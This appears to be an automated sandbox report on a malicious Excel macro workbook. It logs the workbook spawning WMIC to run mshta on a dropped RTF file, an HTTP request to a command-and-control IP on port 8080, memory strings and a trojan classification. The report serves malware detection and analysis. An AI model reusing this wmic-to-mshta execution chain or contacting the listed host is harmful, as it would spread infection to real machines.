Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\wbem\WMIC.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49167 -> 157.230.250.107:8080 |
Source: Joe Sandbox View |
IP Address: 157.230.250.107 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 157.230.250.107 |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107: |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8 |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:80 |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhor |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9 |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107:8080/mfkrmotherfuckeru6y82sasswhorehf9e |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.107ecz |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.250.10jeca |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.25ON |
Source: mshta.exe, 00000006.00000002.670897956.000000000026E000.00000004.00000020.sdmp |
String found in binary or memory: http://157.230.25TP.6W? |
Source: mshta.exe, 00000006.00000002.670976357.0000000000318000.00000004.00000020.sdmp |
String found in binary or memory: http://g.F |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: EXCEL.EXE, 00000000.00000002.676235965.0000000007620000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676332579.0000000007876000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676317726.0000000007816000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676303973.00000000077A6000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.open |
Source: EXCEL.EXE, 00000000.00000002.676235965.0000000007620000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.openformatrg/package/2006/content-t |
Source: EXCEL.EXE, 00000000.00000002.676332579.0000000007876000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676317726.0000000007816000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.676303973.00000000077A6000.00000004.00000001.sdmp |
String found in binary or memory: http://schemas.openformatrg/package/2006/r |
Source: mshta.exe, 00000006.00000002.671944211.0000000003340000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: WMIC.exe, 00000003.00000002.540231820.0000000001BA0000.00000002.00020000.sdmp |
String found in binary or memory: http://servername/isapibackend.dll |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: mshta.exe, 00000006.00000002.671944211.0000000003340000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: EXCEL.EXE, 00000000.00000002.675265228.00000000050E7000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671734489.0000000003047000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: global traffic |
HTTP traffic detected: GET /mfkrmotherfuckeru6y82sasswhorehf9e HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Language: en-usUser-Agent: lubeHost: 157.230.250.107:8080 |
Source: Yara match |
File source: C:\ProgramData\vqcMnINBAOOJC.rtf, type: DROPPED |
Source: 56449657.xlsm |
Initial sample: Sheet name: Macro1 |
Source: EXCEL.EXE, 00000000.00000002.675909092.0000000005A24000.00000004.00000001.sdmp |
Binary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default=C:=C:\Users\user\DocumentsALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeFP_NO_HOST_CHECK=NOHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=4OS=Windows_NTPath=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=GIGIYTFUSERNAME=userUSERPROFILE=C:\Users\userWecVersionForRosebud.6AC=4windir=C:\Windowswindows_tracing_flags=3windows_tracing_logfile=C:\BVTBin\Tests\installpackage\csilogfile.logs:dce |
|
Source: 56449657.xlsm |
Macro extractor: Sheet: Macro1 high usage of CHAR() function: 21 |
Source: 56449657.xlsm |
Macro extractor: Sheet name: Macro1 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E6743 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E6340 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E6753 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E66E8 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Code function: 0_2_024E66F3 |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\vqcMnINBAOOJC.rtf" |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\vqcMnINBAOOJC.rtf |
|
Source: C:\Windows\System32\wbem\WMIC.exe |
WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create |
Source: mshta.exe, 00000006.00000002.671489662.0000000002E60000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal80.troj.expl.evad.winXLSM@4/6@0/1 |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: 56449657.xlsm |
Initial sample: OLE zip file path = xl/media/image1.png |
Source: 56449657.xlsm |
Initial sample: OLE zip file path = docProps/custom.xml |
Source: FC330000.0.dr |
Initial sample: OLE zip file path = xl/media/image1.png |
Source: unknown |
Process created: cmd line: vqcmninbaoojc.rtf |
|
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process created: cmd line: vqcmninbaoojc.rtf |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\wbem\WMIC.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: Yara match |
File source: app.xml, type: SAMPLE |
Source: EXCEL.EXE, 00000000.00000002.671125037.0000000000740000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671122049.0000000000900000.00000002.00020000.sdmp |
Binary or memory string: Shell_TrayWnd |
Source: EXCEL.EXE, 00000000.00000002.671125037.0000000000740000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671122049.0000000000900000.00000002.00020000.sdmp |
Binary or memory string: !Progman |
Source: EXCEL.EXE, 00000000.00000002.671125037.0000000000740000.00000002.00020000.sdmp, mshta.exe, 00000006.00000002.671122049.0000000000900000.00000002.00020000.sdmp |
Binary or memory string: Program Manager< |
Source: C:\Windows\System32\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |